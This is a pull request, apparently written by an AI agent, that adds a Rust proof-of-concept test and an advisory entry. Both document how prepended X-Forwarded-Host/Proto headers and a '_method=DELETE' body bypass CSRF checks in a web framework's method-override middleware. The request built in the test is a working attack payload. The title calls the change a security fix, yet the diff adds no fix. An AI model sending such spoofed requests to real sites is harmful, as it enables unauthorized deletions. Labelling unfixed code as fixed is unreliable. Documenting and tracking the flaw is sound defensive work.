### PR TITLE
🔒 Warden: [security fix] Add X-Forwarded-* Spoofing PoC Test

### DIFF
--- a/autumn/tests/security/method_override_spoofing.rs
+++ b/autumn/tests/security/method_override_spoofing.rs
@@ -1,0 +1,43 @@
+use axum::{
+    Router,
+    body::Body,
+    http::{Request, StatusCode},
+    routing::post,
+};
+use tower::{Layer, ServiceExt};
+
+#[tokio::test]
+async fn eris_attacker_can_spoof_x_forwarded_host_and_proto() {
+    let router = Router::new().route(
+        "/items/1",
+        post(|| async { "post" }).delete(|| async { "deleted" }),
+    );
+    // Method override needs to be layered on top of the whole router
+    let app = autumn_web::middleware::MethodOverrideLayer::new().layer(router);
+
+    let req = Request::builder()
+        .method("POST")
+        .uri("/items/1")
+        .header("content-type", "application/x-www-form-urlencoded")
+        .header("origin", "https://evil.example")
+        .header("host", "internal.cluster.local")
+        // The attacker tries to spoof by injecting their own headers first
+        .header("x-forwarded-host", "evil.example")
+        .header("x-forwarded-host", "app.example")
+        .header("x-forwarded-proto", "https")
+        .header("x-forwarded-proto", "http")
+        .body(Body::from("_method=DELETE"))
+        .unwrap();
+
+    let res = app.oneshot(req).await.unwrap();
+
+    // Eris Finding: Method override succeeds because the parser takes the first prepended value,
+    // overriding the appended values from the proxy. This is documented in eris_advisories.md.
+    // If it successfully spoofed (method overridden to DELETE), we get 200 OK and "deleted" body.
+    assert_eq!(res.status(), StatusCode::OK);
+
+    let body_bytes = axum::body::to_bytes(res.into_body(), usize::MAX)
+        .await
+        .unwrap();
+    assert_eq!(std::str::from_utf8(&body_bytes).unwrap(), "deleted");
+}

--- a/autumn/tests/security/mod.rs
+++ b/autumn/tests/security/mod.rs
@@ -10,6 +10,7 @@ pub mod csrf_path_traversal;
 pub mod csrf_timing;
 pub mod ctf;
 pub mod fallback_middleware_bypass;
+pub mod method_override_spoofing;
 pub mod rate_limit_xff_bypass;
 pub mod session_exhaustion;
 pub mod session_fixation;

--- a/eris_advisories.md
+++ b/eris_advisories.md
@@ -1,3 +1,9 @@
 # [ERIS-NOTE] CSRF on HTMX Endpoints
 
 The hypothesis that "I can bypass CSRF protection on htmx endpoints by omitting the HX-Request header and submitting a standard form POST" was extensively tested and found to be false. The `CsrfLayer` securely applies validation on all non-safe methods regardless of the presence of htmx-specific headers, and gracefully falls back to checking the URL-encoded body if the header token is absent.
+
+# [ERIS-FINDING] X-Forwarded-* Spoofing Bypass in Method Override
+- **Threat:** Attacker can spoof `X-Forwarded-Host` and `X-Forwarded-Proto` headers (e.g., by prepending their own values) to bypass Origin/Host CSRF validations in the Method Override middleware.
+- **Severity:** High (CSRF bypass)
+- **Note:** After analysis, blindly parsing `.last()` breaks legitimate multi-proxy setups. A proper fix requires edge-proxy header stripping or configuring `trusted_proxies`.
+- **Proof of Concept:** Added `eris_attacker_can_spoof_x_forwarded_host_and_proto` to `autumn/tests/security/method_override_spoofing.rs` to track this vulnerability.


### PR DESCRIPTION
🦠 **Threat:** Attacker can spoof `X-Forwarded-Host` and `X-Forwarded-Proto` headers (e.g., by prepending their own values) to bypass Origin/Host CSRF validations in the Method Override middleware. 

🛡️ **Defense:** A framework mitigation taking the `.last()` proxy-appended value is unsafe and breaks legitimate multi-proxy setups where the client-facing scheme is leftmost. A proper defense requires configuring `trusted_proxies` to traverse the header chain correctly or relying on edge proxies to strip spoofed headers. As an offensive demonstration (Eris), the vulnerability is tracked with a new PoC test.

💥 **Severity:** High (CSRF bypass potential)

🧪 **Verification:** Added `eris_attacker_can_spoof_x_forwarded_host_and_proto` to `autumn/tests/security/method_override_spoofing.rs` to ensure the attack surface is documented. Verified using `cargo test -p autumn-web --test security_tests`.

---
*PR created automatically by Jules for task [3393369944904006537](https://jules.google.com/task/3393369944904006537) started by @madmax983*